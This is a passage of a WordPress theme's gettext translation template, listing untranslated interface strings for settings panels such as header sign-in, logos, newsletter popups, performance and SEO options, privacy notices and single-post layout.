backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view mobile menu in " "the dark mode." msgstr "" #: backend/panels/header.php:474 msgid "" "Select a text color for toggle button, search, quick view menu for displaying on the " "mobile header in the dark mode." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:494 msgid "" "Select a text color for menu item, sub menu item and other elements for displaying in " "the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/panels/header.php:520 msgid "Select settings for the popup sign in form." msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/header.php:532 templates/header/templates.php:315 #: templates/header/templates.php:317 templates/header/templates.php:616 #: templates/popup.php:191 msgid "Sign In" msgstr "" #: backend/panels/header.php:533 msgid "Enable or disable the sign in button on the header." msgstr "" #: backend/panels/header.php:540 msgid "Mobile Header - Sign In" msgstr "" #: backend/panels/header.php:541 msgid "Enable or disable the sign in button on the mobile header." msgstr "" #: backend/panels/header.php:547 msgid "Trigger Button Layout" msgstr "" #: backend/panels/header.php:548 msgid "Select a layout for the sign in trigger button." msgstr "" #: backend/panels/header.php:550 msgid "Icon" msgstr "" #: backend/panels/header.php:551 msgid "Text Button" msgstr "" #: backend/panels/header.php:558 msgid "Form Heading" msgstr "" #: backend/panels/header.php:559 msgid "Input a heading for the login form." msgstr "" #: backend/panels/header.php:560 msgid "Welcome Back!" msgstr "" #: backend/panels/header.php:565 msgid "Form Description" msgstr "" #: backend/panels/header.php:566 msgid "Input a description for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:567 msgid "Sign in to your account" msgstr "" #: backend/panels/header.php:572 msgid "Form Logo" msgstr "" #: backend/panels/header.php:573 msgid "Adding a custom logo for the login form. Leave blank to set it as the default." msgstr "" #: backend/panels/header.php:580 msgid "Dark Mode - Form Logo" msgstr "" #: backend/panels/header.php:581 msgid "Adding a custom logo for the login form in the dark mode." msgstr "" #: backend/panels/header.php:589 msgid "Input a redirect URL when the user logged in." msgstr "" #: backend/panels/header.php:595 msgid "Custom Register URL" msgstr "" #: backend/panels/header.php:596 msgid "Input a custom register URL if have." msgstr "" #: backend/panels/header.php:602 msgid "Custom Forget Password URL" msgstr "" #: backend/panels/header.php:603 msgid "Input a custom forget password URL if have." msgstr "" #: backend/panels/header.php:609 msgid "User Dashboard Menu" msgstr "" #: backend/panels/header.php:610 msgid "Assign a menu for displaying when hovering on the login icon if user logged." msgstr "" #: backend/panels/header.php:612 msgid "- Assign a Menu -" msgstr "" #: backend/panels/header.php:618 backend/panels/login.php:111 msgid "Logout Redirect URL" msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/header.php:620 msgid "This setting apply to the logout button in the logged user dropdown." msgstr "" #: backend/panels/header.php:636 backend/panels/header.php:651 msgid "Alert Bar" msgstr "" #: backend/panels/header.php:639 msgid "This section will show a small alert or event at the bottom of the navigation." msgstr "" #: backend/panels/header.php:645 msgid "" "The alert bar will not be available if you use a header template. The theme provides " "other ways for you to add any info into the header template via HTML, text and button " "and other blocks." msgstr "" #: backend/panels/header.php:652 msgid "" "Enable or disable the alert bar below the header. This option will be overridden by " "the setting in individual post/page." msgstr "" #: backend/panels/header.php:658 msgid "Only Homepage" msgstr "" #: backend/panels/header.php:659 msgid "Only show the bar in the homepage." msgstr "" #: backend/panels/header.php:666 msgid "Alert Content" msgstr "" #: backend/panels/header.php:667 msgid "Input your alert content to show." msgstr "" #: backend/panels/header.php:673 msgid "Alert URL" msgstr "" #: backend/panels/header.php:674 msgid "Input your alert URL." msgstr "" #: backend/panels/header.php:683 msgid "Select background color for the bar." msgstr "" #: backend/panels/header.php:691 msgid "Select text color for the bar." msgstr "" #: backend/panels/header.php:699 msgid "Select background color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:707 msgid "Select text color for the bar in the dark mode." msgstr "" #: backend/panels/header.php:711 msgid "Hide when Sticky" msgstr "" #: backend/panels/header.php:712 msgid "Hide this bar on the sticky navigation." msgstr "" #: backend/panels/header.php:729 msgid "Mini Cart" msgstr "" #: backend/panels/header.php:732 msgid "Show a cart icon at the website header." msgstr "" #: backend/panels/header.php:738 msgid "Header Mini Cart" msgstr "" #: backend/panels/header.php:739 msgid "Show mini cart icon in the header." msgstr "" #: backend/panels/header.php:746 msgid "Mobile Header - Mini Cart" msgstr "" #: backend/panels/header.php:747 msgid "Show mini cart icon in the mobile header." msgstr "" #: backend/panels/heading.php:15 msgid "Heading Design" msgstr "" #: backend/panels/heading.php:17 msgid "The global heading settings for blocks, widgets, archives." msgstr "" #: backend/panels/heading.php:23 msgid "You can also choose layouts and colors for individual heading the page builder." msgstr "" #: backend/panels/heading.php:29 msgid "To edit the heading typography, navigate to \"Typography > Block Heading\"." msgstr "" #: backend/panels/heading.php:35 msgid "Global Heading" msgstr "" #: backend/panels/heading.php:40 msgid "Global Heading Layout" msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for your website." msgstr "" #: backend/panels/heading.php:42 msgid "Navigate to \"Typography Settings > Block Heading\" to set the font values." msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/heading.php:50 backend/panels/heading.php:135 msgid "Select a primary color for the heading." msgstr "" #: backend/panels/heading.php:57 backend/panels/heading.php:142 msgid "Accent Heading Color" msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/heading.php:66 backend/panels/heading.php:151 msgid "Dark Mode - Primary Heading Color" msgstr "" #: backend/panels/heading.php:67 backend/panels/heading.php:152 msgid "Select a primary color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:74 backend/panels/heading.php:159 msgid "Dark Mode - Accent Heading Color" msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:90 msgid "Sidebar Widget Heading" msgstr "" #: backend/panels/heading.php:95 msgid "Widget Heading Layout" msgstr "" #: backend/panels/heading.php:96 msgid "Select a heading layout for the sidebar widgets." msgstr "" #: backend/panels/heading.php:97 msgid "Default layout is based on the \"Global Heading Layout\" setting." msgstr "" #: backend/panels/heading.php:104 msgid "Footer Widget Heading Layout" msgstr "" #: backend/panels/heading.php:105 msgid "Select a heading layout for the footer column widgets." msgstr "" #: backend/panels/heading.php:112 msgid "Widget Heading HTML Tag" msgstr "" #: backend/panels/heading.php:113 msgid "Select a title HTML tag for the sidebar widget heading." msgstr "" #: backend/panels/heading.php:114 msgid "The default tag is H4." msgstr "" #: backend/panels/heading.php:129 msgid "Heading Color" msgstr "" #: backend/panels/login.php:12 msgid "Login Screen" msgstr "" #: backend/panels/login.php:13 msgid "Select option for the login screen page." msgstr "" #: backend/panels/login.php:20 backend/panels/table-contents.php:105 msgid "Layout Settings" msgstr "" #: backend/panels/login.php:25 msgid "Custom Login Screen" msgstr "" #: backend/panels/login.php:26 msgid "Enable or disable wp-login.php page style." msgstr "" #: backend/panels/login.php:36 msgid "Login Form Position" msgstr "" #: backend/panels/login.php:37 msgid "Select a position for the login form." msgstr "" #: backend/panels/login.php:40 msgid "- Left -" msgstr "" #: backend/panels/login.php:51 msgid "Login Logo" msgstr "" #: backend/panels/login.php:52 msgid "" "Upload your logo for the logo screen. This option will override on wordpress logo." msgstr "" #: backend/panels/login.php:57 msgid "Logo - Destination URL" msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/login.php:59 msgid "Leave this option blank to redirect to the homepage." msgstr "" #: backend/panels/login.php:66 msgid "Login Screen Background" msgstr "" #: backend/panels/login.php:67 msgid "Upload your background for the logo screen." msgstr "" #: backend/panels/login.php:79 msgid "Login Screen Color" msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/login.php:96 msgid "Navigate to \"Header > Popup Sign In\" to set for the popup login form." msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/login.php:105 backend/panels/login.php:113 msgid "Leave this option blank to set the default value." msgstr "" #: backend/panels/login.php:119 backend/panels/login.php:146 msgid "Disable Admin Bar" msgstr "" #: backend/panels/login.php:120 backend/panels/login.php:147 msgid "Disable admin bar for all users except for Administrators" msgstr "" #: backend/panels/login.php:126 backend/panels/login.php:153 msgid "Disable Language Bar" msgstr "" #: backend/panels/login.php:127 backend/panels/login.php:154 msgid "Disable the language bar in the login screen." msgstr "" #: backend/panels/login.php:140 msgid "Admin Bar" msgstr "" #: backend/panels/logo.php:16 msgid "Logo" msgstr "" #: backend/panels/logo.php:30 msgid "Default Logos" msgstr "" #: backend/panels/logo.php:31 msgid "The settings below apply to whole your website." msgstr "" #: backend/panels/logo.php:39 msgid "" "To add the favicon, navigate to \"Appearance > Customize > Site Identity > Site Icon" "\". Please read the documentation for further information." msgstr "" #: backend/panels/logo.php:46 msgid "Main Logo" msgstr "" #: backend/panels/logo.php:47 msgid "" "Select or upload site logo. Recommended logo height value is 60px, allowed extensions " "are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:54 msgid "Dark Mode - Main Logo" msgstr "" #: backend/panels/logo.php:55 msgid "" "Select or upload a light logo for displaying in the dark mode. It should be same " "dimensions with the site logo." msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: backend/panels/logo.php:63 msgid "" "Select or upload retina (2x) logo. Recommended logo height value is 120px, allowed " "extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:70 msgid "Dark Mode - Retina Main Logo" msgstr "" #: backend/panels/logo.php:71 msgid "" "Select or upload a light retina logo for displaying in the dark mode. It should be " "same dimensions with the retina site logo" msgstr "" #: backend/panels/logo.php:85 msgid "Mobile Logos" msgstr "" #: backend/panels/logo.php:86 msgid "Select or upload logos for displaying in the mobile device." msgstr "" #: backend/panels/logo.php:95 msgid "Mobile Logo" msgstr "" #: backend/panels/logo.php:96 msgid "" "Upload a logo for the mobile device. Recommended logo height value is 84px, allowed " "extensions are .jpg, .png and .gif" msgstr "" #: backend/panels/logo.php:103 msgid "Dark Mode - Mobile Logo" msgstr "" #: backend/panels/logo.php:104 msgid "" "Upload a light retina logo for displaying in mobile device. It should be same " "dimensions with the mobile logo." msgstr "" #: backend/panels/logo.php:115 msgid "Transparent Logos" msgstr "" #: backend/panels/logo.php:116 msgid "Select or upload logos for displaying in the transparent headers." msgstr "" #: backend/panels/logo.php:125 msgid "Transparent Logo" msgstr "" #: backend/panels/logo.php:126 msgid "" "Upload a light logo for transparent headers. Recommended logo height value is 60px, " "allowed extensions are .jpg, .png and .gif." msgstr "" #: backend/panels/logo.php:133 msgid "Transparent Retina Logo" msgstr "" #: backend/panels/logo.php:134 msgid "" "Upload a light retina logo for transparent headers. Recommended logo height value is " "120px." msgstr "" #: backend/panels/logo.php:149 msgid "Bookmarklet" msgstr "" #: backend/panels/logo.php:150 msgid "Select or upload bookmarklet icons for iOS and Android devices." msgstr "" #: backend/panels/logo.php:159 msgid "iOS Bookmarklet Icon" msgstr "" #: backend/panels/logo.php:160 msgid "" "Upload icon for the Apple touch (72 x 72px), allowed extensions are .jpg, .png, .gif" msgstr "" #: backend/panels/logo.php:167 msgid "Metro UI Bookmarklet Icon" msgstr "" #: backend/panels/logo.php:168 msgid "" "Upload icon for the Metro interface (144 x 144px), allowed extensions are .jpg, .png, ." "gif" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/newsletter.php:15 msgid "Select settings for the popup newsletter." msgstr "" #: backend/panels/newsletter.php:21 msgid "Please update cover images to your own images after importing the theme demo." msgstr "" #: backend/panels/newsletter.php:28 msgid "Enable or disable the popup newsletter form." msgstr "" #: backend/panels/newsletter.php:35 msgid "Input title for the popup newsletter form" msgstr "" #: backend/panels/newsletter.php:36 msgid "Join Us!" msgstr "" #: backend/panels/newsletter.php:42 msgid "Input description for the popup newsletter form" msgstr "" #: backend/panels/newsletter.php:43 msgid "Subscribe to our newsletter and never miss our latest news, podcasts etc." msgstr "" #: backend/panels/newsletter.php:48 backend/panels/single-post.php:355 msgid "Newsletter Shortcode" msgstr "" #: backend/panels/newsletter.php:49 msgid "Input a newsletter shortcode." msgstr "" #: backend/panels/newsletter.php:50 msgid "[mc4wp_form]" msgstr "" #: backend/panels/newsletter.php:55 msgid "Footer Text" msgstr "" #: backend/panels/newsletter.php:56 msgid "Input a footer text for the box." msgstr "" #: backend/panels/newsletter.php:57 msgid "Zero spam, Unsubscribe at any time." msgstr "" #: backend/panels/newsletter.php:62 msgid "Footer URL" msgstr "" #: backend/panels/newsletter.php:63 msgid "Add a link for the footer text (optional)." msgstr "" #: backend/panels/newsletter.php:71 msgid "Cover Image" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:93 msgid "Display Mode" msgstr "" #: backend/panels/newsletter.php:94 msgid "Select a mode to display the newsletter popup." msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/newsletter.php:97 msgid "Time Delay" msgstr "" #: backend/panels/newsletter.php:104 msgid "Distance of Scroll" msgstr "" #: backend/panels/newsletter.php:105 msgid "" "This option use for \"Scroll Distance\" mode. Input a distance value (px) when visitor " "scrolling down to show the popup." msgstr "" #: backend/panels/newsletter.php:112 msgid "" "This option use for \"Time Delay\" mode. Input a delay time (ms) value to show the " "popup after the site loaded." msgstr "" #: backend/panels/optimized.php:14 msgid "Performance" msgstr "" #: backend/panels/optimized.php:15 msgid "Select options to optimize your website speed." msgstr "" #: backend/panels/optimized.php:21 #, php-format msgid "" "We recommend you to refer this DOCUMENTATION to " "optimize for you website" msgstr "" #: backend/panels/optimized.php:27 msgid "Lazy Load Featured Image" msgstr "" #: backend/panels/optimized.php:28 msgid "Enable or disable the lazy load for the featured image." msgstr "" #: backend/panels/optimized.php:35 msgid "Disable Srcset" msgstr "" #: backend/panels/optimized.php:36 msgid "Disable Srcset to optimize page speed score on mobile device." msgstr "" #: backend/panels/optimized.php:43 msgid "Disable Dashicons" msgstr "" #: backend/panels/optimized.php:44 msgid "" "Some 3rd party plugins will load this font icon. Disable it if you have not plan to " "use it." msgstr "" #: backend/panels/optimized.php:51 msgid "Disable Gutenberg Style on Page Builder" msgstr "" #: backend/panels/optimized.php:52 msgid "Disable the block style css on the page built with Page Builder." msgstr "" #: backend/panels/optimized.php:59 msgid "Disable Polyfill Script" msgstr "" #: backend/panels/optimized.php:60 msgid "" "Disable wp-polyfill script (supporting older browsers that do not understand ES6) to " "improve the page speed score." msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/optimized.php:68 msgid "Enable or disable preload Google fonts to increase the site speed score." msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:75 msgid "Enable or disable preload font icons to increase the site speed score." msgstr "" #: backend/panels/optimized.php:81 msgid "Disable Default Fonts" msgstr "" #: backend/panels/optimized.php:82 msgid "" "The theme will load default fonts to render some elements as heading tags, body, meta." msgstr "" #: backend/panels/optimized.php:83 msgid "Enable this option if all fonts in Typography panels is set." msgstr "" #: backend/panels/optimized.php:90 msgid "Force write Dynamic CSS to file" msgstr "" #: backend/panels/optimized.php:91 msgid "Write CSS to file to reduce CPU usage and reduce the load time." msgstr "" #: backend/panels/optimized.php:92 msgid "" "The dynamic file CSS may not apply immediately on some servers due to the server cache." msgstr "" #: backend/panels/optimized.php:107 msgid "SEO Optimized" msgstr "" #: backend/panels/optimized.php:108 msgid "" "Select SEO options for your website. This panel helps your website optimized for SEO " "and appear better on the search engines." msgstr "" #: backend/panels/optimized.php:115 msgid "SEO Snippets" msgstr "" #: backend/panels/optimized.php:121 msgid "Organization Schema Markup" msgstr "" #: backend/panels/optimized.php:122 msgid "" "Enable or disable schema markup for the website, helps generate brand signals. Disable " "this option if you want to use 3rd party plugin." msgstr "" #: backend/panels/optimized.php:129 msgid "Sitelinks Search Box" msgstr "" #: backend/panels/optimized.php:130 msgid "" "Enable or disable website markup, helps to show the Search Box feature for brand SERPs " "and can help your website name to appear in search results." msgstr "" #: backend/panels/optimized.php:137 msgid "Breadcrumbs bar" msgstr "" #: backend/panels/optimized.php:138 msgid "" "Breadcrumbs are a hierarchy of links displayed in search engines and your website. " "This option requests the \"Breadcrumb NavXT\"." msgstr "" #: backend/panels/optimized.php:144 msgid "ItemList (Carousel) Markup" msgstr "" #: backend/panels/optimized.php:145 msgid "Enable the Carousels (Item List) schema markup for your Homepage." msgstr "" #: backend/panels/optimized.php:152 msgid "Article Markup" msgstr "" #: backend/panels/optimized.php:153 msgid "" "Enable or disable the default schema markup for single post page if you want to use " "3rd party plugin." msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/panels/optimized.php:161 msgid "" "Enable or disable review product markup for single post page if you want to use 3rd " "party plugin." msgstr "" #: backend/panels/optimized.php:175 msgid "Organization Info" msgstr "" #: backend/panels/optimized.php:181 msgid "Home Description" msgstr "" #: backend/panels/optimized.php:182 msgid "" "Short description will display when searching your main site URL. Leave blank if you " "use 3rd plugins." msgstr "" #: backend/panels/optimized.php:188 msgid "Phone Number" msgstr "" #: backend/panels/optimized.php:189 msgid "input your company phone number." msgstr "" #: backend/panels/optimized.php:195 backend/panels/single-post.php:804 #: backend/panels/single-post.php:943 backend/panels/single-post.php:1081 #: backend/panels/single-post.php:1705 msgid "Email" msgstr "" #: backend/panels/optimized.php:196 msgid "input your company main email." msgstr "" #: backend/panels/optimized.php:202 msgid "Locality Address" msgstr "" #: backend/panels/optimized.php:203 msgid "input your company city and country address." msgstr "" #: backend/panels/optimized.php:209 msgid "Street Address" msgstr "" #: backend/panels/optimized.php:210 msgid "input your company street address." msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: backend/panels/optimized.php:217 msgid "input your company local postal code." msgstr "" #: backend/panels/optimized.php:230 backend/panels/optimized.php:236 msgid "Open Graph" msgstr "" #: backend/panels/optimized.php:237 msgid "" "Enable or disable Open Graph (share to social). This option will be automatically " "disabled if you use Yoast SEO." msgstr "" #: backend/panels/optimized.php:244 msgid "Facebook APP ID" msgstr "" #: backend/panels/optimized.php:245 msgid "input your facebook app ID for OG tags." msgstr "" #: backend/panels/optimized.php:253 msgid "Facebook Default Image" msgstr "" #: backend/panels/optimized.php:254 msgid "" "This image is used if the post/page being shared does not contain featured images." msgstr "" #: backend/panels/page.php:16 msgid "Single Page" msgstr "" #: backend/panels/page.php:18 msgid "The settings below apply to the single page." msgstr "" #: backend/panels/page.php:30 msgid " Page Header Style" msgstr "" #: backend/panels/page.php:31 msgid "Select a header style for the single page." msgstr "" #: backend/panels/page.php:33 backend/single-metaboxes.php:61 msgid "Style 1" msgstr "" #: backend/panels/page.php:35 backend/single-metaboxes.php:63 msgid "No Header" msgstr "" #: backend/panels/page.php:42 backend/panels/single-post.php:182 #: backend/single-metaboxes.php:69 msgid "Max Width Content without Sidebar" msgstr "" #: backend/panels/page.php:43 backend/panels/single-post.php:183 #: backend/single-metaboxes.php:70 msgid "Select a max-width for the content area without sidebar." msgstr "" #: backend/panels/page.php:45 backend/panels/single-post.php:185 #: backend/single-metaboxes.php:74 msgid "Small - 860px" msgstr "" #: backend/panels/page.php:60 backend/panels/sidebar.php:7 #: backend/panels/single-post.php:424 backend/single-metaboxes.php:83 #: backend/single-metaboxes.php:442 msgid "Sidebar Area" msgstr "" #: backend/panels/page.php:67 msgid "Select a sidebar position or disable it for the single page." msgstr "" #: backend/panels/page.php:75 msgid "Assign a widget section for the sidebar for the single page if it is enabled." msgstr "" #: backend/panels/page.php:83 msgid "Enable or disable sticky sidebar feature for the single page." msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/privacy.php:8 msgid "Select options for the privacy notice bar." msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:15 msgid "Enable or disable the privacy bar." msgstr "" #: backend/panels/privacy.php:21 msgid "Box Position" msgstr "" #: backend/panels/privacy.php:22 msgid "Select a position to display the privacy box." msgstr "" #: backend/panels/privacy.php:24 msgid "Fixed Left" msgstr "" #: backend/panels/privacy.php:26 msgid "Fixed Bottom" msgstr "" #: backend/panels/privacy.php:33 msgid "Content" msgstr "" #: backend/panels/privacy.php:34 msgid "Input your privacy or cookie content for your website, allow raw HTML." msgstr "" #: backend/panels/privacy.php:35 msgid "" "By using this site, you agree to the Privacy Policy and Terms of Use." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/reaction.php:16 backend/single-metaboxes.php:839 msgid "User Reaction" msgstr "" #: backend/panels/reaction.php:17 msgid "Select options for the reaction section." msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/panels/reaction.php:24 msgid "Enable or disable the reaction section at the end of single post pages." msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:32 msgid "Input a title for the reaction section. Leave blank to set it as the default." msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:38 msgid "Select reaction items you would like to show." msgstr "" #: backend/panels/reaction.php:42 msgid "Love" msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/reaction.php:44 msgid "Happy" msgstr "" #: backend/panels/reaction.php:45 msgid "Sleepy" msgstr "" #: backend/panels/reaction.php:46 msgid "Angry" msgstr "" #: backend/panels/reaction.php:47 msgid "Dead" msgstr "" #: backend/panels/reaction.php:48 msgid "Wink" msgstr "" #: backend/panels/reaction.php:51 msgid "Cry" msgstr "" #: backend/panels/reaction.php:52 msgid "Embarrass" msgstr "" #: backend/panels/reaction.php:53 msgid "Joy" msgstr "" #: backend/panels/reaction.php:54 msgid "Shy" msgstr "" #: backend/panels/reaction.php:55 msgid "Surprise" msgstr "" #: backend/panels/sidebar.php:8 msgid "" "Select settings for your website sidebars, The settings below apply to all sidebars." msgstr "" #: backend/panels/sidebar.php:15 msgid "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: backend/panels/sidebar.php:21 msgid "" "To edit the widget heading layout, navigate to \"Heading Design > Sidebar Widget " "Heading\"." msgstr "" #: backend/panels/sidebar.php:26 msgid "Global Sidebar Position" msgstr "" #: backend/panels/sidebar.php:27 msgid "Select the default sidebar position for your website." msgstr "" #: backend/panels/sidebar.php:28 msgid "" "This is the global option and will be overridden by individual \"Sidebar Position\" " "settings." msgstr "" #: backend/panels/sidebar.php:37 msgid "Unlimited Sidebars" msgstr "" #: backend/panels/sidebar.php:38 msgid "Add a Sidebar ID" msgstr "" #: backend/panels/sidebar.php:39 msgid "Create new or delete exist sidebars." msgstr "" #: backend/panels/sidebar.php:40 msgid "" "Click on the \"Create Sidebar\" button, then input a name/ID (without special charsets " "and spacing) into the field to create a new sidebar." msgstr "" #: backend/panels/sidebar.php:41 msgid "Click then Input ID to Create a Sidebar" msgstr "" #: backend/panels/sidebar.php:48 msgid "Making sidebars permanently visible when scrolling up and down." msgstr "" #: backend/panels/sidebar.php:49 msgid "" "Useful when a sidebar is too tall or too short compared to the rest of the content." msgstr "" #: backend/panels/sidebar.php:55 msgid "Widget Block Editor" msgstr "" #: backend/panels/sidebar.php:56 msgid "Enable or disable widget block editor (WordPress 5.8 or above)." msgstr "" #: backend/panels/single-post.php:28 msgid "Layouts" msgstr "" #: backend/panels/single-post.php:30 msgid "Select layouts for the single post that based on the post formats." msgstr "" #: backend/panels/single-post.php:38 msgid "Standard Post Format Layout" msgstr "" #: backend/panels/single-post.php:44 msgid "Single Layout" msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:46 msgid "The layout automatically rollback to the \"Classic\" if featured image isn't set." msgstr "" #: backend/panels/single-post.php:60 msgid "Video Post Format Layout" msgstr "" #: backend/panels/single-post.php:66 msgid "Video Post Layout" msgstr "" #: backend/panels/single-post.php:67 msgid "Select a global layout for the video post format." msgstr "" #: backend/panels/single-post.php:74 backend/single-metaboxes.php:356 msgid "Autoplay Video" msgstr "" #: backend/panels/single-post.php:75 msgid "Autoplay the featured video when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:82 msgid "Floating Video" msgstr "" #: backend/panels/single-post.php:83 msgid "Floating video on the screen on scroll." msgstr "" #: backend/panels/single-post.php:97 msgid "Audio Post Format Layout" msgstr "" #: backend/panels/single-post.php:103 msgid "Audio Post Layout" msgstr "" #: backend/panels/single-post.php:104 msgid "Select a global layout for the audio post format." msgstr "" #: backend/panels/single-post.php:111 backend/single-metaboxes.php:404 msgid "Autoplay Audio" msgstr "" #: backend/panels/single-post.php:112 msgid "Autoplay the featured audio when the visitors scrolling to it." msgstr "" #: backend/panels/single-post.php:126 msgid "Gallery Post Format Layout" msgstr "" #: backend/panels/single-post.php:132 backend/single-metaboxes.php:424 msgid "Gallery Layout" msgstr "" #: backend/panels/single-post.php:133 msgid "Select a global layout for the gallery post format." msgstr "" #: backend/panels/single-post.php:155 msgid "Content Area" msgstr "" #: backend/panels/single-post.php:157 msgid "Select options for content area." msgstr "" #: backend/panels/single-post.php:165 msgid "Width Settings" msgstr "" #: backend/panels/single-post.php:171 msgid "Paragraph Line Length" msgstr "" #: backend/panels/single-post.php:172 msgid "Optimized the line length of the post content for reading (max width: 730px)." msgstr "" #: backend/panels/single-post.php:175 msgid "Optimal Line Length" msgstr "" #: backend/panels/single-post.php:200 msgid "Hyperlink Settings" msgstr "" #: backend/panels/single-post.php:205 msgid "Hyperlink Style" msgstr "" #: backend/panels/single-post.php:206 msgid "Select a font style for the post hyperlinks." msgstr "" #: backend/panels/single-post.php:209 msgid "Bold" msgstr "" #: backend/panels/single-post.php:210 msgid "Bold Italic" msgstr "" #: backend/panels/single-post.php:211 msgid "Normal Italic" msgstr "" #: backend/panels/single-post.php:212 msgid "Normal" msgstr "" #: backend/panels/single-post.php:218 msgid "Hyperlink Color" msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/single-post.php:226 msgid "Dark Mode - Hyperlink Color" msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:234 msgid "Hyperlink Underline" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/single-post.php:245 msgid "Underline Color" msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global color." msgstr "" #: backend/panels/single-post.php:253 msgid "Dark Mode - Underline Color" msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: backend/panels/single-post.php:276 msgid "" "Enable or disable quick view info bar (review & sponsor meta) at the top of the " "content." msgstr "" #: backend/panels/single-post.php:290 msgid "Footer Area" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/single-post.php:297 msgid "Enable or disable the post tags bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:304 msgid "Sources Bar" msgstr "" #: backend/panels/single-post.php:305 msgid "Enable or disable the sources bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:312 msgid "Via Bar" msgstr "" #: backend/panels/single-post.php:313 msgid "Enable or disable the via bar at the bottom of the post content." msgstr "" #: backend/panels/single-post.php:327 backend/panels/single-post.php:333 msgid "Bottom Newsletter" msgstr "" #: backend/panels/single-post.php:334 msgid "Enable or disable the newsletter form at bottom entry content." msgstr "" #: backend/panels/single-post.php:341 msgid "Newsletter Heading" msgstr "" #: backend/panels/single-post.php:342 msgid "Input your a heading for your newsletter section." msgstr "" #: backend/panels/single-post.php:343 msgid "Sign Up For Daily Newsletter" msgstr "" #: backend/panels/single-post.php:348 msgid "Newsletter Description" msgstr "" #: backend/panels/single-post.php:349 msgid "Input your a description for your newsletter." msgstr "" #: backend/panels/single-post.php:350 msgid "Be keep up! Get the latest breaking news delivered straight to your inbox." msgstr "" #: backend/panels/single-post.php:356 msgid "" "Input your a newsletter (subscribe) shortcode or script to show at bottom entry " "content." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:363 msgid "Input your policy text for the newsletter form, row HTML allowed." msgstr "" #: backend/panels/single-post.php:377 msgid "Author Card & Next/Prev Pagination" msgstr "" #: backend/panels/single-post.php:384 msgid "Enable or disable the author information in the bottom of the content." msgstr "" #: backend/panels/single-post.php:385 msgid "The author box requests author information (Users > Profile) for displaying." msgstr "" #: backend/panels/single-post.php:392 msgid "Next/Prev Post Pagination" msgstr "" #: backend/panels/single-post.php:393 msgid "Enable or disable the next/previous link navigation in single post pages." msgstr "" #: backend/panels/single-post.php:401 msgid "Next/Prev - Mobile Hide" msgstr "" #: backend/panels/single-post.php:402 msgid "Hide Next/Prev 